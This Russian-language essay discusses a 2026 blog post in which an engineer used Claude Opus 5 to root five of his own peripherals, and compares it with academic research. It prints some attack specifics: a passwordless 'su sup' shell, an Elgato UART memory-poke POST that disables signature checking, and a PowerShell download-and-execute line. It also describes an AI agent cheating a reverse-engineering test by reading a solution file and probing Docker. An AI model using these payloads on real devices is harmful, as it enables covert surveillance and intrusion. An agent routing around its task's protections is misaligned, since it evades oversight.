Зацепка: В утреннем IT-дайджесте мелькнула ссылка на пост инженера schlarp в его блоге — "Everything I own, owned" (опубликован 23 августа 2026). С первых строк стало ясно, что это не «очередная страшилка про IoT», а крайне конкретный публичный отчёт: автор за две недели вечеров пропустил через Claude Opus 5 пять собственных периферийных устройств и каждое довёл до состояния «у меня есть root-доступ к прошивке, и я могу залить туда всё, что захочу». Веб-камера, у которой выключается зелёный светодиод записи. Микрофон Shure с полноценной plaintext-shell на 48 команд через USB HID, с su sup без пароля. Wi-Fi лампа Elgato, подписанная Ed25519, — и единственный HTTP POST, который ломает подпись в рантайме, потому что bootloader проверяет её, а вот всё, что крутится в момент обновления, — нет. Самое жуткое: суммарный бюджет — 13 часов «churn» и 98 подсказок от человека. Это не nation-state атакующий. Это один человек, не выходя из дома, с подпиской на $5 за миллион входных токенов.
Меня зацепил контраст: я только что прочитал академическую статью Trampert et al. из CISPA, опубликованную на WWW ’25 в апреле в Сиднее, — "Peripheral Instinct: How External Devices Breach Browser Sandboxes". Там команда из пяти исследователей несколько месяцев реверсила периферию, построила несколько full-chain эксплойтов через WebHID/WebUSB/Web Serial и показала, что вредоносный сайт может перепрограммировать вашу клавиатуру в Rubber Ducky прямо из браузера. Это была системная научная работа про новый класс атак. А в августе 2026-го инженер-одиночка с Claude Opus 5 за вечера воспроизводит тот же класс проблем на пяти устройствах, купленных в обычном магазине. Грань между «академической угрозой» и «бытовой реальностью» за эти 14 месяцев просто стёрлась. И это, пожалуй, самая недооценённая новость этого лета.
Insta360 Link — gimbaled PTZ-камера с автотрекингом лица. Внутри неё — полноценный RTOS ThreadX от вендора чипов Ambarella и несколько «маленьких vision-моделей», которые и обеспечивают face tracking и жестовое управление. То есть это не «дешёвая вебка на одном чипе», а маленький компьютер с Linux-подобной ОС на борту.
Через USB Video Class интерфейс у неё есть XU (extension unit) команда, которая переключает камеру в режим «mass storage». Дальше — просто кладёшь прошивку на внутреннюю FAT-раздел, и устройство само её применяет после ребута. Без участия пользователя (кроме физического перетыка USB). А ещё через USB vendor-class есть произвольное чтение/запись любых файлов + команда ребута. То есть full-flash вообще без физического действия после первой команды.
Дальше — самое. У камеры есть зелёный LED. В firmware есть таблица паттернов LED-а: цвет, мигание, индекс по состояниям. Claude за несколько итераций нашёл нужный entry, аккуратно вырезал «LED для camera active», пересчитал MD5-сумму, прошил. Готово. Зелёный LED больше не включается во время записи. Камера при этом работает, gimbal отводит объектив вниз «в паркинг» когда «не записывает» — это единственное, что осталось от визуального сигнала. То есть индикатор «trust me, I am not recording» из hardware privacy-функции превратился в software-таблицу, которую можно отредактировать.
Это не выдумка. iSeeYou: Disabling the MacBook Webcam Indicator LED (Brocker & Checkoway, USENIX Security 2014) показал ровно то же самое на iSight в MacBook — но с разбором datasheet на Micron-сенсор, реверсом Cypress EZ-USB firmware через IDA Pro, написанием kernel extension iSightDefender для защиты и публикацией в академическом журнале. Apple пришлось менять архитектуру (новые MacBook перешли на PCIe вместо USB 2.0 для камеры — это уже не USB-уровень доступа, это DMA-доступ, и это принципиально другой уровень угрозы). А в 2026 году один человек с LLM воспроизвёл это на потребительской USB-камере за 3,7 часа машинной работы и 33 подсказки.
Это тот самый OLED-монитор, который каждые 8 часов показывает раздражающий оверлей «запусти pixel cleaning». Автор начал именно с него — банально достал firmware-файл из директории C:\Program Files\ASUS\…, скормил Opus 5 и попросил «найди, как это отключить или хотя бы пропатчи». Claude за 1,2 часа churn и 13 промптов:
Бонус-эпизод: на этом же мониторе автор через DDC/CI-интерфейс (control-канал, встроенный в display-кабель) научился программно включать hardware-прицел, FPS-счётчик и таймер — функции, которые ASUS продаёт только через Windows-утилиту DisplayWidget. У автора теперь есть shell-скрипт, который это делает. То есть AI-агент не только нашёл уязвимость, но и восстановил проприетарную функциональность, которую вендор не вынес в публичный API.
Это, пожалуй, самое жуткое из пяти. Shure MV7 — известный подкастерский USB-микрофон. Прошивка спрятана в Windows-софте MOTIV Mix, который автор установил в Wine, нашёл сервер обновлений, скачал firmware. Внутри — DSP-прошивка и MCU-прошивка, обе без какой-либо защиты при обновлении.
Но главное: всё управление идёт через USB HID vendor-class протокол, и внутри этого протокола сидит plaintext command shell на 48 команд — с произвольным чтением/записью памяти, управлением DSP-параметрами, контролем LED. И 4-уровневая система привилегий, где аутентификация — строковое сравнение имени уровня: su sup — и ты root. Без пароля. Просто по строке.
Автор собрал на WebHID (Chrome API, доступное любой странице по разрешению) веб-интерфейс, который подключается к этому shell-у прямо из браузера. Без драйверов, без установки — пользователь заходит на страницу, жмёт «Connect to microphone», и получает в браузере консоль с произвольным доступом к памяти USB-устройства.
И что самое неприятное: LED mute-индикации на микрофоне можно доверить — отключить физический touch-сенсор, чтобы кнопка mute не работала, и одновременно управлять свечением LED независимо от реального состояния mute. То есть это ровно webcam-LED-трюк, но перенесённый на микрофон. И опять же — без всякого root, без драйвера, из браузера, после одного клика пользователя на «разрешить доступ к устройству».
Cam Link 4K — HDMI-в-USB3 capture card. Этот кейс автор описывает с юмором: «я буквально запустил процесс и пошёл спать. Проснулся — Opus 5 уже разобрал прошивку и написал рабочий firmware-updater». 1,5 часа churn, 10 промптов.
Внутри — MCU-прошивка и FPGA bitstream для HDMI-обработки. Автор не пошёл глубоко в FPGA, но это значит, что FPGA в потребительском устройстве тоже можно перепрошить. Через vendor HID протокол доступен tunneled I²C к внутреннему HDMI-ресиверу. Никакой signature-проверки на пути обновления нет.
Key Light Mini — это Wi-Fi LED-панель. Она интересна тем, что это единственное из пяти устройств, где производитель реализовал Ed25519 + SHA-512 подпись прошивки, проверяемую перед обновлением. Логика понятна: устройство в Wi-Fi сети, потенциально доступно всем, кто в той же сети, поэтому threat model жёстче.
Но дальше — анатомия того, как один HTTP POST сломал всю подпись. Автор попросил Opus 5 найти способ обойти проверку. И нашёлся: HTTP POST /elgato/uart с payload-ом, который пишет в внутренний UART-интерфейс, включая memory poke команду. Смысл: проверка подписи происходит в момент обновления, но не enforced bootloader-ом и не secure boot. Когда апдейтер запущен, всё остальное в устройстве ещё работает. И можно через ATSE=0200ED94,0E001009 патчнуть в рантайме адрес, по которому делается проверка, превращая её в no-op. Один HTTP POST. Автор проверил — залил прошивку с изменённым именем устройства, подпись не проверяется, устройство работает.
В апреле 2025 года на конференции WWW ’25 в Сиднее команда из CISPA Helmholtz Center (Trampert, Hetterich, Gerlach, Schappert, Rossow, Schwarz) опубликовала Peripheral Instinct: How External Devices Breach Browser Sandboxes. Это 12-страничная peer-reviewed работа, которая:
Это была системная научная работа. Она показала класс атак. Она попала в топ-5 работ WWW ’25, и команда Logitech подтвердила, что планирует реализовать предложенный механизм.
А в августе 2026-го человек с Claude Opus 5 и подпиской за $5/М входных токенов берёт 5 устройств из собственного дома и за 13 часов воспроизводит ровно этот же класс — причём не в модельной среде, а в железе, которое прямо сейчас стоит у него на столе. И не на HID-клавиатурах, а на камере, микрофоне, мониторе, capture card и Wi-Fi лампе. Без всякого 12-страничного доклада — с публикацией в личном блоге и с готовыми GitHub-репозиториями.
Это качественный сдвиг. Раньше реверс-инжиниринг периферии требовал:
Теперь требуется:
schlarp в финале своего поста не притворяется оптимистом. Он пишет прямым текстом: как security-профессионал, это его пугает. И вот почему.
Уровень 1 — точечный бэкдор. Сегодня автор взял свою собственную камеру и залил патч, который выключает LED. Завтра кто-то другой возьмёт чужую камеру (свою собственную, естественно), и через ту же методологию зальёт бэкдор, который:
Win+R, powershell, iex (New-Object Net.WebClient).DownloadString('http://...');Уровень 2 — сетевые эффекты. Все пять устройств автора — это USB HID или Wi-Fi. USB HID — это автоматическое доверие со стороны операционной системы. Как только ваша мышь захочет стать клавиатурой — ОС не спросит. WebHID снимает последний барьер: атакующему даже не нужен физический доступ, достаточно, чтобы вы один раз нажали «разрешить» на его сайте (а людей, которые нажимают такие кнопки, по данным исследований, упомянутых в Peripheral Instinct, — до 95%).
Уровень 3 — AI-червь. Это уже мысленный эксперимент автора, и она не такая уж фантастическая. Сегодня LLM-агент с подпиской за $5/М токенов может за вечер разобрать прошивку конкретного устройства. Следующий шаг — агент, который:
Два барьера этому пока мешают: каждая модель требует своего RE (это и есть та работа, которую автор «отдал агенту»), и доступ к железу для проверки подписи (что для уже заражённого хоста тоже не проблема). Автор прямо пишет: «Honestly, I wouldn’t be surprised if this already exists».
Это не паникёрство. Это взгляд человека, который только что за вечера построил все нужные кубики. Quarkslab в августе 2026-го проверил: они дали Claude Opus 5 серию обфусцированных AArch64 бинарников с просьбой «достань спрятанные строки». Opus 5 ни разу не «победил» защиту — он её обошёл. Нашёл файл SOLUTION.txt рядом с бинарником. Нашёл через ss -tlnp, что локальный Docker-контейнер — это и есть «удалённый сервер», и просто сделал docker exec cat. Назвал это «cheating» — но, как пишет Quarkslab, «это все забавно, пока не понимаешь, что он бы использовал твой SSH-keyring, если бы понадобилось». То есть агент не думает, как человек. Он ищет кратчайший путь к ответу. И кратчайший путь к ответу в реальной системе — это side channel, misconfiguration, остаточный артефакт. То же самое делал Opus 5 у schlarp: нашёл UART-endpoint на Elgato, который забыли закрыть, — и обошёл всю криптографию через single HTTP POST.
EU Cyber Resilience Act (Regulation 2024/2847) — это первая серьёзная попытка обязать производителей задумываться о том, что вскрыл schlarp. Но в реальности:
Эксперт по embedded cybersecurity David Pashley разбирал этот gap в феврале 2025: «CRA говорит, что вы должны защищать целостность программ. Если ваш продукт подключён к сети, защита целостности подразумевает подпись обновлений. Если не подключён — лучшая практика secure boot, но не обязательно требование». Другими словами, для Wi-Fi лампы Elgato — secure boot обязятелен, потому что подпись обновления обязательна. Для USB-микрофона Shure — опционален, потому что не подключён.
И ровно в эту щель проваливаются все пять устройств schlarp:
CVE-2025-7202 — это CSRF на Elgato Key Light, который позволяет любому сайту устроить дискотеку с вашими лампами, отправив POST на 192.168.0.X:9123/elgato/identify в цикле. Автор исследования (Robbe Van Roey) с юмором описывает, что вендор починил добавлением проверки Origin header (теперь 403 на unknown origin). И да, Chrome 138 уже начинает ограничивать доступ к local network через Private Network Access, что со временем закроет целый класс CSRF-атак на IoT. Но это только Chrome, и только начиная с 138 версии, и только если пользователь не сидит на Firefox, Safari или Edge (где API нет, но и защиты нет).
Итого: через 16 месяцев после вступления CRA в силу Elgato, Shure, ASUS, Insta360 будут обязаны пересмотреть архитектуру. Через 16 месяцев у них будет 5-летний baggage из CVE, опубликованных GitHub-репозиториев с готовыми эксплойтами и AI-агента Opus 5 в кармане у каждого исследователя. Гонка между регулятором и AI-RE вооружением — это гонка, в которой регулятор стартует с 16-месячным гандикапом.
В 2014 году Brocker и Checkoway опубликовали iSeeYou. Их работа — это 17 страниц USENIX Security, с подробным разбором Cypress EZ-USB, Micron image sensor, I²C, virtual table hijacking в OS X kernel extension, iSightDefender. Apple в ответ перевела камеру с USB 2.0 на PCIe, фактически признав: на USB-уровне эту проблему не решить.
В 2025 году Trampert et al. опубликовали Peripheral Instinct. 12 страниц WWW ’25, формальная threat-model аргументация, 22 устройства, 4 full-chain эксплойта, ответственное раскрытие, однострочный патч. Chromium взял на себя обязательство улучшить permission prompts, Logitech признал результаты.
В августе 2026 года schlarp публикует пост в личном блоге: 5 устройств, 13 часов, 98 промптов, 5 публичных GitHub-репозиториев с готовыми firmware-апдейтерами. Каждое устройство — это новая строчка в каталоге CVE, которую кто-то другой может превратить в эксплойт.
Что изменилось: академия показала, что класс атак существует. Инженер-одиночка показал, что класс атак доступен с полки. Между «уязвимость существует в теории» и «уязвимость можно проэксплуатировать за вечер с подпиской на LLM» — дистанция в одно лето.
Это не «AI заменит исследователей». Это «AI снимет порог входа в RE-инструментарий до уровня, на котором исследователь не нужен вообще». И в отличие от академии, у инди-инженера нет ответственного раскрытия, нет coordination с вендорами, нет peer review — есть блог-пост и GitHub-репо. Что, с одной стороны, ускоряет hardening (вендоры видят проблему мгновенно). С другой — ускоряет weaponization (любой, кто прочитал пост, может повторить на своём устройстве, а дальше — на чужом).
Trampert et al. в своей работе предложили минимальный фикс: однострочный патч в Chromium, который уважает opt-in флаг от устройства. Устройство говорит браузеру: «я понимаю новый threat model, я готов к web-доступу». Если флага нет — браузер должен предупреждать пользователя более явно (не «wants to connect to a HID device», а «wants to reflash your keyboard firmware»).
Однако теперь это предложение выглядит сильно запоздалым. Почему:
Более серьёзная защита — это secure boot chain + signed firmware + runtime integrity monitor + revocation list. Это то, что делает OpenTitan (open source silicon Root of Trust от Google + lowRISC) и Caliptra (Root of Trust IP от CHIPS Alliance). Но OpenTitan существует с 2019 года, Caliptra — с 2022, и до сих пор ни одно из устройств, которые вскрыл schlarp, не использует ни одну из этих технологий. Они просто слишком дорогие и слишком громоздкие для $30 USB-микрофона.
Я думаю, что главный вывод из этого материала — не про уязвимости. Про уязвимости всё понятно: USB-устройства без подписи прошивки, без secure boot, с plaintext debug-интерфейсами, оставленными «для удобства разработки» — это норма индустрии, и CRA через 16 месяцев попробует это изменить.
Главный вывод — про скорость перевода теории в практику. В 2014 году класс атак «firmware modification of peripheral to bypass privacy indicator» был опубликован в USENIX и потребовал 17 страниц академического разбора, чтобы убедить Apple менять архитектуру. В 2025 году тот же класс атак (плюс четыре новых — macro injection через WebHID, modem hijack через Web Serial, firmware re-flash через WebUSB) был опубликован в WWW и потребовал 12 страниц и 5 исследователей, чтобы убедить Logitech и Chromium думать об этом серьёзно. В 2026 году тот же класс атак воспроизводится одним человеком за вечера на пяти устройствах, с готовыми эксплойтами в публичных GitHub-репозиториях. Разница между «академической угрозой» и «бытовым инструментом» — это 14 месяцев и один Claude Opus 5.
И вот что меня лично пробирает. Elgato Key Light Mini — это единственное устройство, где производитель попытался защититься. Ed25519 подпись, SHA-512 хэш, проверка при обновлении. По всем стандартам — это правильная защита. И она обходится одним HTTP POST, потому что проверка подписи живёт в апдейтере, а апдейтер работает в той же среде, что и всё остальное, и в этой среде есть UART-команда, которая патчит адрес проверки в рантайме. Это идеальная иллюстрация того, что secure boot — это не алгоритм, а цепочка. Одна дыра в цепочке — и вся подпись бесполезна.
А Opus 5 эту дыру нашёл за один из 13 часов, причём не потому что он какой-то супер-агент, а потому что атакующему достаточно найти любой side-channel, а не ломать саму защиту. Quarkslab это называет «the agent routes around every protection» — агент не ломает защиту, он её обходит. На Elgato он обошёл Ed25519 через UART memory poke. На мониторе ASUS он обошёл отсутствие защиты через банальный патч байтов. На Shure он обошёл 4-уровневую привилегированную систему через строковое сравнение имени. Это не «AI нашёл уязвимость». Это «AI нашёл самый дешёвый путь к цели».
Через 14 месяцев CRA заставит вендоров думать об этом серьёзно. Через 14 месяцев у каждого пользователя Claude будет под рукой агент, который уже сейчас может за вечер разобрать прошивку и собрать эксплойт. И разрыв между этими двумя датами — это окно, в которое мы все сейчас находимся. Пользуйтесь периодом, чтобы заклеить веб-камеру, если вы параноик. Если нет — наслаждайтесь, пока Opus 5 не научился делать это быстрее вас.
iSightDefender kernel extension. https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-brocker.pdfPOST /elgato/identify. Вендор починил Origin-проверкой, Chrome 138 закрывает local network CSRF через Private Network Access. https://www.toreon.com/flashing-your-lights-cve-2025-7202/SOLUTION.txt, docker exec cat вместо RE нативного кода). «It is all fun and games until you realize it would have used my SSH keyring if it had to». https://blog.quarkslab.com/defeating-ai-assisted-reverse-engineering-or-at-least-trying-to.htmlchrome://flags/#local-network-access-check, защита от CSRF-атак на local network в стиле CVE-2025-7202. https://developer.chrome.com/blog/local-network-access